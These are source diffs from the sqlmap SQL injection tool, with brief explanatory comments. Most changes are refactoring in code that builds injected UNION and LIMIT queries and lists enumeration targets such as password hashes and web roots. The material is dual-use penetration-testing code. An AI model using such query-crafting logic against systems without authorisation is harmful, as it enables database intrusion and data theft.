errMsg += "knowledge of underlying DBMS"
|
errMsg += "knowledge of underlying DBMS"
|
||||||
@@ -371,7 +366,7 @@ class Agent(object):
|
|||||||
rootQuery = queries[Backend.getIdentifiedDbms()]
|
rootQuery = queries[Backend.getIdentifiedDbms()]
|
||||||
hexField = field
|
hexField = field
|
||||||
|
|
||||||
if 'hex' in rootQuery:
|
if "hex" in rootQuery:
|
||||||
hexField = rootQuery.hex.query % field
|
hexField = rootQuery.hex.query % field
|
||||||
else:
|
else:
|
||||||
warnMsg = "switch '--hex' is currently not supported on DBMS %s" % Backend.getIdentifiedDbms()
|
warnMsg = "switch '--hex' is currently not supported on DBMS %s" % Backend.getIdentifiedDbms()
|
||||||
@@ -540,7 +535,7 @@ class Agent(object):
|
|||||||
fieldsToCastStr = fieldsToCastStr or ""
|
fieldsToCastStr = fieldsToCastStr or ""
|
||||||
|
|
||||||
# Function
|
# Function
|
||||||
if re.search("\A\w+\(.*\)", fieldsToCastStr, re.I) or (fieldsSelectCase and "WHEN use" not in query) or fieldsSubstr:
|
if re.search(r"\A\w+\(.*\)", fieldsToCastStr, re.I) or (fieldsSelectCase and "WHEN use" not in query) or fieldsSubstr:
|
||||||
fieldsToCastList = [fieldsToCastStr]
|
fieldsToCastList = [fieldsToCastStr]
|
||||||
else:
|
else:
|
||||||
fieldsToCastList = splitFields(fieldsToCastStr)
|
fieldsToCastList = splitFields(fieldsToCastStr)
|
||||||
@@ -632,7 +627,7 @@ class Agent(object):
|
|||||||
concatenatedQuery = concatenatedQuery.replace("SELECT ", "'%s'||" % kb.chars.start, 1)
|
concatenatedQuery = concatenatedQuery.replace("SELECT ", "'%s'||" % kb.chars.start, 1)
|
||||||
_ = unArrayizeValue(zeroDepthSearch(concatenatedQuery, " FROM "))
|
_ = unArrayizeValue(zeroDepthSearch(concatenatedQuery, " FROM "))
|
||||||
concatenatedQuery = "%s||'%s'%s" % (concatenatedQuery[:_], kb.chars.stop, concatenatedQuery[_:])
|
concatenatedQuery = "%s||'%s'%s" % (concatenatedQuery[:_], kb.chars.stop, concatenatedQuery[_:])
|
||||||
concatenatedQuery = re.sub(r"('%s'\|\|)(.+)(%s)" % (kb.chars.start, re.escape(castedFields)), "\g<2>\g<1>\g<3>", concatenatedQuery)
|
concatenatedQuery = re.sub(r"('%s'\|\|)(.+)(%s)" % (kb.chars.start, re.escape(castedFields)), r"\g<2>\g<1>\g<3>", concatenatedQuery)
|
||||||
elif fieldsSelect:
|
elif fieldsSelect:
|
||||||
concatenatedQuery = concatenatedQuery.replace("SELECT ", "'%s'||" % kb.chars.start, 1)
|
concatenatedQuery = concatenatedQuery.replace("SELECT ", "'%s'||" % kb.chars.start, 1)
|
||||||
concatenatedQuery += "||'%s'" % kb.chars.stop
|
concatenatedQuery += "||'%s'" % kb.chars.stop
|
||||||
@@ -644,7 +639,7 @@ class Agent(object):
|
|||||||
concatenatedQuery = concatenatedQuery.replace("SELECT ", "'%s'+" % kb.chars.start, 1)
|
concatenatedQuery = concatenatedQuery.replace("SELECT ", "'%s'+" % kb.chars.start, 1)
|
||||||
concatenatedQuery += "+'%s'" % kb.chars.stop
|
concatenatedQuery += "+'%s'" % kb.chars.stop
|
||||||
elif fieldsSelectTop:
|
elif fieldsSelectTop:
|
||||||
topNum = re.search("\ASELECT\s+TOP\s+([\d]+)\s+", concatenatedQuery, re.I).group(1)
|
topNum = re.search(r"\ASELECT\s+TOP\s+([\d]+)\s+", concatenatedQuery, re.I).group(1)
|
||||||
concatenatedQuery = concatenatedQuery.replace("SELECT TOP %s " % topNum, "TOP %s '%s'+" % (topNum, kb.chars.start), 1)
|
concatenatedQuery = concatenatedQuery.replace("SELECT TOP %s " % topNum, "TOP %s '%s'+" % (topNum, kb.chars.start), 1)
|
||||||
concatenatedQuery = concatenatedQuery.replace(" FROM ", "+'%s' FROM " % kb.chars.stop, 1)
|
concatenatedQuery = concatenatedQuery.replace(" FROM ", "+'%s' FROM " % kb.chars.stop, 1)
|
||||||
elif fieldsSelectCase:
|
elif fieldsSelectCase:
|
||||||
@@ -756,13 +751,13 @@ class Agent(object):
|
|||||||
if fromTable and query.endswith(fromTable):
|
if fromTable and query.endswith(fromTable):
|
||||||
query = query[:-len(fromTable)]
|
query = query[:-len(fromTable)]
|
||||||
|
|
||||||
topNumRegex = re.search("\ATOP\s+([\d]+)\s+", query, re.I)
|
topNumRegex = re.search(r"\ATOP\s+([\d]+)\s+", query, re.I)
|
||||||
if topNumRegex:
|
if topNumRegex:
|
||||||
topNum = topNumRegex.group(1)
|
topNum = topNumRegex.group(1)
|
||||||
query = query[len("TOP %s " % topNum):]
|
query = query[len("TOP %s " % topNum):]
|
||||||
unionQuery += "TOP %s " % topNum
|
unionQuery += "TOP %s " % topNum
|
||||||
|
|
||||||
intoRegExp = re.search("(\s+INTO (DUMP|OUT)FILE\s+\'(.+?)\')", query, re.I)
|
intoRegExp = re.search(r"(\s+INTO (DUMP|OUT)FILE\s+'(.+?)')", query, re.I)
|
||||||
|
|
||||||
if intoRegExp:
|
if intoRegExp:
|
||||||
intoRegExp = intoRegExp.group(1)
|
intoRegExp = intoRegExp.group(1)
|
||||||
@@ -810,7 +805,7 @@ class Agent(object):
|
|||||||
stopLimit = None
|
stopLimit = None
|
||||||
limitCond = True
|
limitCond = True
|
||||||
|
|
||||||
topLimit = re.search("TOP\s+([\d]+)\s+", expression, re.I)
|
topLimit = re.search(r"TOP\s+([\d]+)\s+", expression, re.I)
|
||||||
|
|
||||||
limitRegExp = re.search(queries[Backend.getIdentifiedDbms()].limitregexp.query, expression, re.I)
|
limitRegExp = re.search(queries[Backend.getIdentifiedDbms()].limitregexp.query, expression, re.I)
|
||||||
|
|
||||||
@@ -937,7 +932,7 @@ class Agent(object):
|
|||||||
limitedQuery += " %s" % limitStr
|
limitedQuery += " %s" % limitStr
|
||||||
|
|
||||||
elif Backend.getIdentifiedDbms() in (DBMS.ORACLE, DBMS.DB2):
|
elif Backend.getIdentifiedDbms() in (DBMS.ORACLE, DBMS.DB2):
|
||||||
if not " ORDER BY " in limitedQuery:
|
if " ORDER BY " not in limitedQuery:
|
||||||
limitStr = limitStr.replace(") WHERE LIMIT", " ORDER BY 1 ASC) WHERE LIMIT")
|
limitStr = limitStr.replace(") WHERE LIMIT", " ORDER BY 1 ASC) WHERE LIMIT")
|
||||||
elif " ORDER BY " in limitedQuery and "SELECT " in limitedQuery:
|
elif " ORDER BY " in limitedQuery and "SELECT " in limitedQuery:
|
||||||
limitedQuery = limitedQuery[:limitedQuery.index(" ORDER BY ")]
|
limitedQuery = limitedQuery[:limitedQuery.index(" ORDER BY ")]
|
||||||
@@ -958,7 +953,7 @@ class Agent(object):
|
|||||||
orderBy = limitedQuery[limitedQuery.index(" ORDER BY "):]
|
orderBy = limitedQuery[limitedQuery.index(" ORDER BY "):]
|
||||||
limitedQuery = limitedQuery[:limitedQuery.index(" ORDER BY ")]
|
limitedQuery = limitedQuery[:limitedQuery.index(" ORDER BY ")]
|
||||||
|
|
||||||
notDistincts = re.findall("DISTINCT[\(\s+](.+?)\)*\s+", limitedQuery, re.I)
|
notDistincts = re.findall(r"DISTINCT[\(\s+](.+?)\)*\s+", limitedQuery, re.I)
|
||||||
|
|
||||||
for notDistinct in notDistincts:
|
for notDistinct in notDistincts:
|
||||||
limitedQuery = limitedQuery.replace("DISTINCT(%s)" % notDistinct, notDistinct)
|
limitedQuery = limitedQuery.replace("DISTINCT(%s)" % notDistinct, notDistinct)
|
||||||
@@ -975,7 +970,7 @@ class Agent(object):
|
|||||||
limitedQuery = limitedQuery.replace(" (SELECT TOP %s" % startTopNums, " (SELECT TOP %d" % num)
|
limitedQuery = limitedQuery.replace(" (SELECT TOP %s" % startTopNums, " (SELECT TOP %d" % num)
|
||||||
forgeNotIn = False
|
forgeNotIn = False
|
||||||
else:
|
else:
|
||||||
topNum = re.search("TOP\s+([\d]+)\s+", limitedQuery, re.I).group(1)
|
topNum = re.search(r"TOP\s+([\d]+)\s+", limitedQuery, re.I).group(1)
|
||||||
limitedQuery = limitedQuery.replace("TOP %s " % topNum, "")
|
limitedQuery = limitedQuery.replace("TOP %s " % topNum, "")
|
||||||
|
|
||||||
if forgeNotIn:
|
if forgeNotIn:
|
||||||
@@ -991,7 +986,7 @@ class Agent(object):
|
|||||||
limitedQuery += "NOT IN (%s" % (limitStr % num)
|
limitedQuery += "NOT IN (%s" % (limitStr % num)
|
||||||
limitedQuery += "%s %s ORDER BY %s) ORDER BY %s" % (self.nullAndCastField(uniqueField or field), fromFrom, uniqueField or "1", uniqueField or "1")
|
limitedQuery += "%s %s ORDER BY %s) ORDER BY %s" % (self.nullAndCastField(uniqueField or field), fromFrom, uniqueField or "1", uniqueField or "1")
|
||||||
else:
|
else:
|
||||||
match = re.search(" ORDER BY (\w+)\Z", query)
|
match = re.search(r" ORDER BY (\w+)\Z", query)
|
||||||
field = match.group(1) if match else field
|
field = match.group(1) if match else field
|
||||||
|
|
||||||
if " WHERE " in limitedQuery:
|
if " WHERE " in limitedQuery:
|
||||||
@@ -1071,7 +1066,7 @@ class Agent(object):
|
|||||||
"""
|
"""
|
||||||
|
|
||||||
_ = re.escape(PAYLOAD_DELIMITER)
|
_ = re.escape(PAYLOAD_DELIMITER)
|
||||||
return extractRegexResult("(?s)%s(?P<result>.*?)%s" % (_, _), value)
|
return extractRegexResult(r"(?s)%s(?P<result>.*?)%s" % (_, _), value)
|
||||||
|
|
||||||
def replacePayload(self, value, payload):
|
def replacePayload(self, value, payload):
|
||||||
"""
|
"""
|
||||||
@@ -1079,7 +1074,7 @@ class Agent(object):
|
|||||||
"""
|
"""
|
||||||
|
|
||||||
_ = re.escape(PAYLOAD_DELIMITER)
|
_ = re.escape(PAYLOAD_DELIMITER)
|
||||||
return re.sub("(?s)(%s.*?%s)" % (_, _), ("%s%s%s" % (PAYLOAD_DELIMITER, getUnicode(payload), PAYLOAD_DELIMITER)).replace("\\", r"\\"), value) if value else value
|
return re.sub(r"(?s)(%s.*?%s)" % (_, _), ("%s%s%s" % (PAYLOAD_DELIMITER, getUnicode(payload), PAYLOAD_DELIMITER)).replace("\\", r"\\"), value) if value else value
|
||||||
|
|
||||||
def runAsDBMSUser(self, query):
|
def runAsDBMSUser(self, query):
|
||||||
if conf.dbmsCred and "Ad Hoc Distributed Queries" not in query:
|
if conf.dbmsCred and "Ad Hoc Distributed Queries" not in query:
|
||||||
|
@@ -1,15 +1,16 @@
#!/usr/bin/env python

"""
-Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2018 sqlmap developers (http://sqlmap.org/)
-See the file 'doc/COPYING' for copying permission
+See the file 'LICENSE' for copying permission
"""

try:
import cPickle as pickle
except:
import pickle

+import bz2
import itertools
import os
import sys

@@ -18,6 +19,7 @@ import tempfile
from lib.core.enums import MKSTEMP_PREFIX
from lib.core.exception import SqlmapSystemException
from lib.core.settings import BIGARRAY_CHUNK_SIZE
+from lib.core.settings import BIGARRAY_COMPRESS_LEVEL

DEFAULT_SIZE_OF = sys.getsizeof(object())

@@ -27,10 +29,12 @@ def _size_of(object_):
"""

retval = sys.getsizeof(object_, DEFAULT_SIZE_OF)

if isinstance(object_, dict):
retval += sum(_size_of(_) for _ in itertools.chain.from_iterable(object_.items()))
elif hasattr(object_, "__iter__"):
retval += sum(_size_of(_) for _ in object_)

return retval

class Cache(object):

@@ -48,7 +52,7 @@ class BigArray(list):
List-like class used for storing large amounts of data (disk cached)
"""

-def __init__(self):
+def __init__(self, items=[]):
self.chunks = [[]]
self.chunk_length = sys.maxint
self.cache = None

@@ -56,13 +60,18 @@ class BigArray(list):
self._os_remove = os.remove
self._size_counter = 0

+for item in items:
+self.append(item)

def append(self, value):
self.chunks[-1].append(value)

if self.chunk_length == sys.maxint:
self._size_counter += _size_of(value)
if self._size_counter >= BIGARRAY_CHUNK_SIZE:
self.chunk_length = len(self.chunks[-1])
self._size_counter = None

if len(self.chunks[-1]) >= self.chunk_length:
filename = self._dump(self.chunks[-1])
self.chunks[-1] = filename

@@ -76,18 +85,20 @@ class BigArray(list):
if len(self.chunks[-1]) < 1:
self.chunks.pop()
try:
-with open(self.chunks[-1], "rb") as fp:
+with open(self.chunks[-1], "rb") as f:
-self.chunks[-1] = pickle.load(fp)
+self.chunks[-1] = pickle.loads(bz2.decompress(f.read()))
except IOError, ex:
errMsg = "exception occurred while retrieving data "
errMsg += "from a temporary file ('%s')" % ex.message
-raise SqlmapSystemException, errMsg
+raise SqlmapSystemException(errMsg)

return self.chunks[-1].pop()

def index(self, value):
for index in xrange(len(self)):
if self[index] == value:
return index

return ValueError, "%s is not in list" % value

def _dump(self, chunk):

@@ -95,8 +106,8 @@ class BigArray(list):
handle, filename = tempfile.mkstemp(prefix=MKSTEMP_PREFIX.BIG_ARRAY)
self.filenames.add(filename)
os.close(handle)
-with open(filename, "w+b") as fp:
+with open(filename, "w+b") as f:
-pickle.dump(chunk, fp, pickle.HIGHEST_PROTOCOL)
+f.write(bz2.compress(pickle.dumps(chunk, pickle.HIGHEST_PROTOCOL), BIGARRAY_COMPRESS_LEVEL))
return filename
except (OSError, IOError), ex:
errMsg = "exception occurred while storing data "

@@ -104,20 +115,21 @@ class BigArray(list):
errMsg += "make sure that there is enough disk space left. If problem persists, "
errMsg += "try to set environment variable 'TEMP' to a location "
errMsg += "writeable by the current user"
-raise SqlmapSystemException, errMsg
+raise SqlmapSystemException(errMsg)

def _checkcache(self, index):
if (self.cache and self.cache.index != index and self.cache.dirty):
filename = self._dump(self.cache.data)
self.chunks[self.cache.index] = filename

if not (self.cache and self.cache.index == index):
try:
-with open(self.chunks[index], "rb") as fp:
+with open(self.chunks[index], "rb") as f:
-self.cache = Cache(index, pickle.load(fp), False)
+self.cache = Cache(index, pickle.loads(bz2.decompress(f.read())), False)
except IOError, ex:
errMsg = "exception occurred while retrieving data "
errMsg += "from a temporary file ('%s')" % ex.message
-raise SqlmapSystemException, errMsg
+raise SqlmapSystemException(errMsg)

def __getstate__(self):
return self.chunks, self.filenames

@@ -127,19 +139,19 @@ class BigArray(list):
self.chunks, self.filenames = state

def __getslice__(self, i, j):
-retval = BigArray()
i = max(0, len(self) + i if i < 0 else i)
j = min(len(self), len(self) + j if j < 0 else j)
-for _ in xrange(i, j):
-retval.append(self[_])
+return BigArray(self[_] for _ in xrange(i, j))
-return retval

def __getitem__(self, y):
if y < 0:
y += len(self)

index = y / self.chunk_length
offset = y % self.chunk_length
chunk = self.chunks[index]

if isinstance(chunk, list):
return chunk[offset]
else:

@@ -150,6 +162,7 @@ class BigArray(list):
index = y / self.chunk_length
offset = y % self.chunk_length
chunk = self.chunks[index]

if isinstance(chunk, list):
chunk[offset] = value
else:
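The BigArray change above replaces plain pickle.dump()/pickle.load() with bz2-compressed blobs whenever a chunk is flushed to a temporary file. A rough standalone sketch of that round trip; the compression level 9 stands in for BIGARRAY_COMPRESS_LEVEL, whose actual value lives in lib/core/settings.py:

import bz2
import os
import pickle
import tempfile

COMPRESS_LEVEL = 9  # stand-in for BIGARRAY_COMPRESS_LEVEL

def dump_chunk(chunk):
    handle, filename = tempfile.mkstemp(prefix="sqlmapba-")
    os.close(handle)
    with open(filename, "w+b") as f:
        f.write(bz2.compress(pickle.dumps(chunk, pickle.HIGHEST_PROTOCOL), COMPRESS_LEVEL))
    return filename

def load_chunk(filename):
    with open(filename, "rb") as f:
        return pickle.loads(bz2.decompress(f.read()))

chunk = list(range(1000))
path = dump_chunk(chunk)
assert load_chunk(path) == chunk
os.remove(path)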
(File diff suppressed because it is too large)

lib/core/convert.py: 18 changes (Executable file → Normal file)
@@ -1,8 +1,8 @@
#!/usr/bin/env python

"""
-Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2018 sqlmap developers (http://sqlmap.org/)
-See the file 'doc/COPYING' for copying permission
+See the file 'LICENSE' for copying permission
"""

try:

@@ -80,7 +80,7 @@ def base64unpickle(value, unsafe=False):
if len(self.stack) > 1:
func = self.stack[-2]
if func not in PICKLE_REDUCE_WHITELIST:
-raise Exception, "abusing reduce() is bad, Mkay!"
+raise Exception("abusing reduce() is bad, Mkay!")
self.load_reduce()

def loads(str):

@@ -94,7 +94,7 @@ def base64unpickle(value, unsafe=False):

try:
retVal = loads(base64decode(value))
except TypeError:
retVal = loads(base64decode(bytes(value)))

return retVal

@@ -110,7 +110,7 @@ def hexdecode(value):
value = value.lower()
return (value[2:] if value.startswith("0x") else value).decode("hex")

-def hexencode(value):
+def hexencode(value, encoding=None):
"""
Encodes string value from plain to hex format

@@ -118,7 +118,7 @@ def hexencode(value):
'666f6f626172'
"""

-return utf8encode(value).encode("hex")
+return unicodeencode(value, encoding).encode("hex")

def unicodeencode(value, encoding=None):
"""

@@ -166,7 +166,7 @@ def htmlunescape(value):

retVal = value
if value and isinstance(value, basestring):
-codes = (('&lt;', '<'), ('&gt;', '>'), ('&quot;', '"'), ('&nbsp;', ' '), ('&amp;', '&'))
+codes = (("&lt;", '<'), ("&gt;", '>'), ("&quot;", '"'), ("&nbsp;", ' '), ("&amp;", '&'), ("&apos;", "'"))
retVal = reduce(lambda x, y: x.replace(y[0], y[1]), codes, retVal)
try:
retVal = re.sub(r"&#x([^ ;]+);", lambda match: unichr(int(match.group(1), 16)), retVal)

@@ -174,7 +174,7 @@ def htmlunescape(value):
pass
return retVal

-def singleTimeWarnMessage(message): # Cross-linked function
+def singleTimeWarnMessage(message): # Cross-referenced function
sys.stdout.write(message)
sys.stdout.write("\n")
sys.stdout.flush()

@@ -193,7 +193,7 @@ def stdoutencode(data):
warnMsg = "cannot properly display Unicode characters "
warnMsg += "inside Windows OS command prompt "
warnMsg += "(http://bugs.python.org/issue1602). All "
-warnMsg += "unhandled occurances will result in "
+warnMsg += "unhandled occurrences will result in "
warnMsg += "replacement with '?' character. Please, find "
warnMsg += "proper character representation inside "
warnMsg += "corresponding output files. "
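htmlunescape() above folds a small entity table over the input with reduce(); the change extends that table with the apostrophe entity. A short illustration of the folding step, with the table trimmed to a few entries:

from functools import reduce  # built-in on Python 2, imported here so the snippet also runs on Python 3

codes = (("&lt;", '<'), ("&gt;", '>'), ("&quot;", '"'), ("&amp;", '&'), ("&apos;", "'"))

value = "1 &lt; 2 &amp;&amp; &quot;a&quot; != &apos;b&apos;"
print(reduce(lambda x, y: x.replace(y[0], y[1]), codes, value))
# 1 < 2 && "a" != 'b'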
@@ -1,8 +1,8 @@
#!/usr/bin/env python

"""
-Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2018 sqlmap developers (http://sqlmap.org/)
-See the file 'doc/COPYING' for copying permission
+See the file 'LICENSE' for copying permission
"""

from lib.core.datatype import AttribDict

@@ -1,8 +1,8 @@
#!/usr/bin/env python

"""
-Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2018 sqlmap developers (http://sqlmap.org/)
-See the file 'doc/COPYING' for copying permission
+See the file 'LICENSE' for copying permission
"""

import copy
@@ -1,10 +1,14 @@
#!/usr/bin/env python

"""
-Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2018 sqlmap developers (http://sqlmap.org/)
-See the file 'doc/COPYING' for copying permission
+See the file 'LICENSE' for copying permission
"""

+import hashlib

+from lib.core.threads import getCurrentThreadData

def cachedmethod(f, cache={}):
"""
Method with a cached content

@@ -13,15 +17,25 @@ def cachedmethod(f, cache={}):
"""

def _(*args, **kwargs):
-try:
-key = (f, tuple(args), frozenset(kwargs.items()))
-if key not in cache:
-cache[key] = f(*args, **kwargs)
-except:
-key = "".join(str(_) for _ in (f, args, kwargs))
-if key not in cache:
-cache[key] = f(*args, **kwargs)
+key = int(hashlib.md5("|".join(str(_) for _ in (f, args, kwargs))).hexdigest(), 16) & 0x7fffffffffffffff
+if key not in cache:
+cache[key] = f(*args, **kwargs)

return cache[key]

return _

+def stackedmethod(f):
+def _(*args, **kwargs):
+threadData = getCurrentThreadData()
+originalLevel = len(threadData.valueStack)

+try:
+result = f(*args, **kwargs)
+finally:
+if len(threadData.valueStack) > originalLevel:
+threadData.valueStack = threadData.valueStack[:originalLevel]

+return result

+return _
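The rewritten cachedmethod above derives one integer cache key from the MD5 of the decorated function and its call arguments, instead of first trying to build a hashable tuple and falling back to string concatenation. A Python 2 flavoured usage sketch mirroring that key construction (on Python 3 the joined string would need an explicit .encode() before hashing):

import hashlib

def cachedmethod(f, cache={}):
    def _(*args, **kwargs):
        # single integer key derived from the function object and its call arguments
        key = int(hashlib.md5("|".join(str(_) for _ in (f, args, kwargs))).hexdigest(), 16) & 0x7fffffffffffffff
        if key not in cache:
            cache[key] = f(*args, **kwargs)
        return cache[key]
    return _

@cachedmethod
def square(x):
    print("computing %s" % x)
    return x * x

square(3)  # prints "computing 3" and returns 9
square(3)  # second call is served from the cache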
@@ -1,27 +1,27 @@
#!/usr/bin/env python

"""
-Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2018 sqlmap developers (http://sqlmap.org/)
-See the file 'doc/COPYING' for copying permission
+See the file 'LICENSE' for copying permission
"""

from lib.core.datatype import AttribDict

_defaults = {
"csvDel": ',',
"timeSec": 5,
"googlePage": 1,
"verbose": 1,
"delay": 0,
"timeout": 30,
"retries": 3,
"saFreq": 0,
"threads": 1,
"level": 1,
"risk": 1,
"dumpFormat": "CSV",
"tech": "BEUSTQ",
"torType": "SOCKS5",
}

defaults = AttribDict(_defaults)
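defaults above is simply an AttribDict built from the _defaults mapping, so fallback option values can be read as attributes elsewhere in the code. A tiny sketch with a minimal stand-in for lib/core/datatype.AttribDict (the real class has more behaviour):

class AttribDict(dict):
    # minimal stand-in: attribute-style access to dictionary keys
    def __getattr__(self, name):
        try:
            return self[name]
        except KeyError:
            raise AttributeError(name)

defaults = AttribDict({"timeSec": 5, "level": 1, "risk": 1, "tech": "BEUSTQ"})
print(defaults.timeSec)  # 5
print(defaults.tech)     # BEUSTQ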
|||||||
@@ -1,10 +1,11 @@
|
|||||||
#!/usr/bin/env python
|
#!/usr/bin/env python
|
||||||
|
|
||||||
"""
|
"""
|
||||||
Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/)
|
Copyright (c) 2006-2018 sqlmap developers (http://sqlmap.org/)
|
||||||
See the file 'doc/COPYING' for copying permission
|
See the file 'LICENSE' for copying permission
|
||||||
"""
|
"""
|
||||||
|
|
||||||
|
from lib.core.enums import CONTENT_TYPE
|
||||||
from lib.core.enums import DBMS
|
from lib.core.enums import DBMS
|
||||||
from lib.core.enums import OS
|
from lib.core.enums import OS
|
||||||
from lib.core.enums import POST_HINT
|
from lib.core.enums import POST_HINT
|
||||||
@@ -184,10 +185,10 @@ DUMP_REPLACEMENTS = {" ": NULL, "": BLANK}
|
|||||||
|
|
||||||
DBMS_DICT = {
|
DBMS_DICT = {
|
||||||
DBMS.MSSQL: (MSSQL_ALIASES, "python-pymssql", "https://github.com/pymssql/pymssql", "mssql+pymssql"),
|
DBMS.MSSQL: (MSSQL_ALIASES, "python-pymssql", "https://github.com/pymssql/pymssql", "mssql+pymssql"),
|
||||||
DBMS.MYSQL: (MYSQL_ALIASES, "python-pymysql", "https://github.com/petehunt/PyMySQL/", "mysql"),
|
DBMS.MYSQL: (MYSQL_ALIASES, "python-pymysql", "https://github.com/PyMySQL/PyMySQL", "mysql"),
|
||||||
DBMS.PGSQL: (PGSQL_ALIASES, "python-psycopg2", "http://initd.org/psycopg/", "postgresql"),
|
DBMS.PGSQL: (PGSQL_ALIASES, "python-psycopg2", "http://initd.org/psycopg/", "postgresql"),
|
||||||
DBMS.ORACLE: (ORACLE_ALIASES, "python cx_Oracle", "http://cx-oracle.sourceforge.net/", "oracle"),
|
DBMS.ORACLE: (ORACLE_ALIASES, "python cx_Oracle", "https://oracle.github.io/python-cx_Oracle/", "oracle"),
|
||||||
DBMS.SQLITE: (SQLITE_ALIASES, "python-sqlite", "http://packages.ubuntu.com/quantal/python-sqlite", "sqlite"),
|
DBMS.SQLITE: (SQLITE_ALIASES, "python-sqlite", "https://docs.python.org/2/library/sqlite3.html", "sqlite"),
|
||||||
DBMS.ACCESS: (ACCESS_ALIASES, "python-pyodbc", "https://github.com/mkleehammer/pyodbc", "access"),
|
DBMS.ACCESS: (ACCESS_ALIASES, "python-pyodbc", "https://github.com/mkleehammer/pyodbc", "access"),
|
||||||
DBMS.FIREBIRD: (FIREBIRD_ALIASES, "python-kinterbasdb", "http://kinterbasdb.sourceforge.net/", "firebird"),
|
DBMS.FIREBIRD: (FIREBIRD_ALIASES, "python-kinterbasdb", "http://kinterbasdb.sourceforge.net/", "firebird"),
|
||||||
DBMS.MAXDB: (MAXDB_ALIASES, None, None, "maxdb"),
|
DBMS.MAXDB: (MAXDB_ALIASES, None, None, "maxdb"),
|
||||||
@@ -208,54 +209,60 @@ FROM_DUMMY_TABLE = {
|
|||||||
}
|
}
|
||||||
|
|
||||||
SQL_STATEMENTS = {
|
SQL_STATEMENTS = {
|
||||||
"SQL SELECT statement": (
|
"SQL SELECT statement": (
|
||||||
"select ",
|
"select ",
|
||||||
"show ",
|
"show ",
|
||||||
" top ",
|
" top ",
|
||||||
" distinct ",
|
" distinct ",
|
||||||
" from ",
|
" from ",
|
||||||
" from dual",
|
" from dual",
|
||||||
" where ",
|
" where ",
|
||||||
" group by ",
|
" group by ",
|
||||||
" order by ",
|
" order by ",
|
||||||
" having ",
|
" having ",
|
||||||
" limit ",
|
" limit ",
|
||||||
" offset ",
|
" offset ",
|
||||||
" union all ",
|
" union all ",
|
||||||
" rownum as ",
|
" rownum as ",
|
||||||
"(case ", ),
|
"(case ",
|
||||||
|
),
|
||||||
|
|
||||||
"SQL data definition": (
|
"SQL data definition": (
|
||||||
"create ",
|
"create ",
|
||||||
"declare ",
|
"declare ",
|
||||||
"drop ",
|
"drop ",
|
||||||
"truncate ",
|
"truncate ",
|
||||||
"alter ", ),
|
"alter ",
|
||||||
|
),
|
||||||
|
|
||||||
"SQL data manipulation": (
|
"SQL data manipulation": (
|
||||||
"bulk ",
|
"bulk ",
|
||||||
"insert ",
|
"insert ",
|
||||||
"update ",
|
"update ",
|
||||||
"delete ",
|
"delete ",
|
||||||
"merge ",
|
"merge ",
|
||||||
"load ", ),
|
"load ",
|
||||||
|
),
|
||||||
|
|
||||||
"SQL data control": (
|
"SQL data control": (
|
||||||
"grant ",
|
"grant ",
|
||||||
"revoke ", ),
|
"revoke ",
|
||||||
|
),
|
||||||
|
|
||||||
"SQL data execution": (
|
"SQL data execution": (
|
||||||
"exec ",
|
"exec ",
|
||||||
"execute ",
|
"execute ",
|
||||||
"values ",
|
"values ",
|
||||||
"call ", ),
|
"call ",
|
||||||
|
),
|
||||||
|
|
||||||
"SQL transaction": (
|
"SQL transaction": (
|
||||||
"start transaction ",
|
"start transaction ",
|
||||||
"begin work ",
|
"begin work ",
|
||||||
"begin transaction ",
|
"begin transaction ",
|
||||||
"commit ",
|
"commit ",
|
||||||
"rollback ", ),
|
"rollback ",
|
||||||
|
),
|
||||||
}
|
}
|
||||||
|
|
||||||
POST_HINT_CONTENT_TYPES = {
|
POST_HINT_CONTENT_TYPES = {
|
||||||
@@ -272,6 +279,9 @@ DEPRECATED_OPTIONS = {
|
|||||||
"--no-unescape": "use '--no-escape' instead",
|
"--no-unescape": "use '--no-escape' instead",
|
||||||
"--binary": "use '--binary-fields' instead",
|
"--binary": "use '--binary-fields' instead",
|
||||||
"--auth-private": "use '--auth-file' instead",
|
"--auth-private": "use '--auth-file' instead",
|
||||||
|
"--ignore-401": "use '--ignore-code' instead",
|
||||||
|
"--second-order": "use '--second-url' instead",
|
||||||
|
"--purge-output": "use '--purge' instead",
|
||||||
"--check-payload": None,
|
"--check-payload": None,
|
||||||
"--check-waf": None,
|
"--check-waf": None,
|
||||||
"--pickled-options": "use '--api -c ...' instead",
|
"--pickled-options": "use '--api -c ...' instead",
|
||||||
@@ -286,3 +296,31 @@ DEFAULT_DOC_ROOTS = {
|
|||||||
OS.WINDOWS: ("C:/xampp/htdocs/", "C:/wamp/www/", "C:/Inetpub/wwwroot/"),
|
OS.WINDOWS: ("C:/xampp/htdocs/", "C:/wamp/www/", "C:/Inetpub/wwwroot/"),
|
||||||
OS.LINUX: ("/var/www/", "/var/www/html", "/usr/local/apache2/htdocs", "/var/www/nginx-default", "/srv/www") # Reference: https://wiki.apache.org/httpd/DistrosDefaultLayout
|
OS.LINUX: ("/var/www/", "/var/www/html", "/usr/local/apache2/htdocs", "/var/www/nginx-default", "/srv/www") # Reference: https://wiki.apache.org/httpd/DistrosDefaultLayout
|
||||||
}
|
}
|
||||||
|
|
||||||
|
PART_RUN_CONTENT_TYPES = {
|
||||||
|
"checkDbms": CONTENT_TYPE.TECHNIQUES,
|
||||||
|
"getFingerprint": CONTENT_TYPE.DBMS_FINGERPRINT,
|
||||||
|
"getBanner": CONTENT_TYPE.BANNER,
|
||||||
|
"getCurrentUser": CONTENT_TYPE.CURRENT_USER,
|
||||||
|
"getCurrentDb": CONTENT_TYPE.CURRENT_DB,
|
||||||
|
"getHostname": CONTENT_TYPE.HOSTNAME,
|
||||||
|
"isDba": CONTENT_TYPE.IS_DBA,
|
||||||
|
"getUsers": CONTENT_TYPE.USERS,
|
||||||
|
"getPasswordHashes": CONTENT_TYPE.PASSWORDS,
|
||||||
|
"getPrivileges": CONTENT_TYPE.PRIVILEGES,
|
||||||
|
"getRoles": CONTENT_TYPE.ROLES,
|
||||||
|
"getDbs": CONTENT_TYPE.DBS,
|
||||||
|
"getTables": CONTENT_TYPE.TABLES,
|
||||||
|
"getColumns": CONTENT_TYPE.COLUMNS,
|
